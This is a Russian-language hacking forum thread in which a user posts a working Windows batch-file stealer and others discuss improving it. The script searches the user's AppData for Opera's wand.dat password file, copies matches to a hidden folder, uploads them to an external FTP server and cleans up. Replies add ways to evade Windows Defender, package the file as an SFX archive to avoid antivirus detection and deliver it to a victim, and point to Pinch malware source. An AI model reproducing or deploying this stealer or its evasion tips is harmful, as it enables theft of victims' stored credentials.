 |
|
10.04.2012, 20:56
|
|
Участник форума
Регистрация: 08.04.2012
Сообщений: 140
Провел на форуме:
35965
Репутация:
0
|
|
Последнее время появилось много "приватных" стилеров, которые способны тянуть файлы с компа жертвы по маске и заливать их на ftp. Стоят такие двух-трех мегабайтные "монстры" на Делфи около $40. Неудевительно, ведь они не палятся
И вот я решил написать своего такого зверя, но не для того, что бы продавать, а показать, насколько это элементарно.
И так вот говнокодец на батче:
Код:
@echo off
prompt $$$g
::настройки
set ans=%temp%\ans
::файл ответов
set login=login
set pwd=pass
::логин-пасс
set dir=%date%_%time%
set ld=%systemdrive%\files
::директории
set pth=%appdata%
set mask=wand.dat
::маска для поиска
echo open ftp.nextmail.ru > %ans%
echo user %login%>> %ans%
echo %pwd%>> %ans%
::логинимя на ftp
echo mkdir %dir% >> %ans%
echo cd %dir% >> %ans%
echo binary >> %ans%
::готовимся передавать файлы
mkdir %ld%
attrib +h %ld%
::виндовый ftp не умеет работать с путями с русскими символами
::forfiles /p %pth% /s /m %mask% /c "cmd /c copy @path %ld%"
for /r "%pth%" %%d in (%mask%) do copy %%d %ld%>nul
::forfiles /p %ld% /s /m * /c "cmd /c echo put @path >> %ans%"
for /r %ld% %%d in (*) do echo put %%d >> %ans%
echo quit >> %ans%
ftp -v -n -s:%ans%
del /q /f %ans%
::del /q /f %0
rmdir /s /q %ld%
pause
Так что, все очень элементарно и просто, да и коментов полно.
Елинственное, замечу, что forfiles, наверно, более элегантен, чем for, но появился только в 2003, так что не так универсален. Что использовать, решать Вам .
А я прошу коментировать мою статью, уточнять и дополнять ее. Спасибо за внимание. |
|
|
15.04.2012, 15:42
|
|
Новичок
Регистрация: 08.03.2012
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Минус в том что Защитник windows будет писать что обнаружен консольный FTP и предложить удалить его.
Лучше использовать консольный e-mail
|
|
|
|
05.08.2012, 06:27
|
|
Новичок
Регистрация: 30.07.2012
Сообщений: 27
Провел на форуме:
4999
Репутация:
0
|
|
+ Автор молодец - материал забавен
- Сейчас все пытаються написать чегото на батах в доказательство их хэккерского естества
А вообще советую автору приглядеться к развитой системе скриптинга в виндосе даже из коробки - MonadShell, WindowsScripringHost.
|
|
|
|
05.08.2012, 11:09
|
|
Участник форума
Регистрация: 08.04.2012
Сообщений: 140
Провел на форуме:
35965
Репутация:
0
|
|
Сообщение от D4rkC10ud
+ Автор молодец - материал забавен
- Сейчас все пытаються написать чегото на батах в доказательство их хэккерского естества
А вообще советую автору приглядеться к развитой системе скриптинга в виндосе даже из коробки - MonadShell, WindowsScripringHost.
Батч просто очень хорошо подходит для манипуляций с файлами, не больше, не меньше. С WSH знаком хорошо, MonadShell нужно заведомо поставить на комп жертвы, а значит он не подходит.
|
|
|
|
05.08.2012, 12:17
|
|
Постоянный
Регистрация: 05.06.2009
Сообщений: 706
Провел на форуме:
2764047
Репутация:
759
|
|
j0sur,
юзал Pinch?
там всё - кодер The Bat (той самой мейл проги) написал, на Си.
сурсы проги есть.
|
|
|
|
05.08.2012, 13:35
|
|
Участник форума
Регистрация: 08.04.2012
Сообщений: 140
Провел на форуме:
35965
Репутация:
0
|
|
Сообщение от altblitz
j0sur
,
юзал Pinch?
там всё - кодер The Bat (той самой мейл проги) написал, на Си.
сурсы проги есть.
Есть люди, которые любят использовать свои велосипеды
|
|
|
|
05.08.2012, 14:21
|
|
Познавший АНТИЧАТ
Регистрация: 30.09.2010
Сообщений: 1,168
Провел на форуме:
257934
Репутация:
288
|
|
Вставлю и я свои 5 копеек.
1)На сколько я понял определить диски в системе бат не может,значит он не сможет искать файлы на всех дисках.
2)Если нужно подсунуть этот файл жертве,то его надо компилить,если его скомпилить он будет палиться.
По этому все это пишется на нормальных ЯП и стоит соответственно.
|
|
|
|
05.08.2012, 14:51
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме:
183267
Репутация:
84
|
|
Сообщение от j0sur
двух-трех мегабайтные "монстры" на Делфи
Стиллер? 2-3 Мб? Руки = false...
|
|
|
|
05.08.2012, 14:56
|
|
Участник форума
Регистрация: 08.04.2012
Сообщений: 140
Провел на форуме:
35965
Репутация:
0
|
|
Сообщение от DooD
Вставлю и я свои 5 копеек.
1)На сколько я понял определить диски в системе бат не может,значит он не сможет искать файлы на всех дисках.
2)Если нужно подсунуть этот файл жертве,то его надо компилить,если его скомпилить он будет палиться.
По этому все это пишется на нормальных ЯП и стоит соответственно.
1) можно(просто весьма муторно), на vbs все это реализуется в 5-10 кб(на харде валяется такой, правда ищет в списке папок, но вместо него генерить список дисков -- 15-20 строк)
2) sfx можно собрать, 100% палится не будет, но и размер порядка 150-200 кб будет, хотя если лепить с чем-то больше 1мб, то врядли кто-то заметит.
В целом, (недо)статья писалась что бы показать насколько это элементарно.
Сообщение от shadowrun
Стиллер? 2-3 Мб? Руки = false...
Скорей всего из-за использованния стандартных дельфовых компонентов. Там реально не может быть столько кода.
|
|
|
|
05.08.2012, 15:06
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме:
183267
Репутация:
84
|
|
Сообщение от j0sur
Скорей всего из-за использованния стандартных дельфовых компонентов. Там реально не может быть столько кода.
Тогда давай не будем вводить пользователей в заблуждение. 2 года назад писал подобное. Быдлокодом + использовал инди и результат вышел около 250 кб. А если юзать сокеты и винапи?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
